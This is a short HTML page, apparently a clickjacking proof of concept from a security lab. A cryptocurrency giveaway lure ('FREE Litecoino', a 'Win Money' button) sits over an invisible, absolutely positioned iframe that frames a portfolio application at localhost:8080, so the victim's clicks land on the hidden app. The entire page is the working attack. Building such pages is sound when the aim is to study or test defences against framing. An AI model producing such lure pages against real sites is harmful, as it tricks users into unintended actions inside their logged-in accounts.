<!DOCTYPE HTML SYSTEM "about:legacy-compat">
<html lang="en">
    <head>
        <title>FREE Litecoino</title>
        <style type="text/css">
#message-content
{
  width    : 200px;
  height   : 100px;
  overflow : hidden;
  top: 0;
  position : absolute;
  opacity: 0;
  border: 1px solid black;
}

</style>
    </head>
    <body>
        <form action="#" method="post">
        	<input type="text" name="addresss">
            <input type="submit" value="Win Money"/>
        </form>

        <div id="message-content" style="width: 1550px; height: 650px">
            <iframe src="http://localhost:8080/portfolio"></iframe>
        </div>
    </body>
</html>













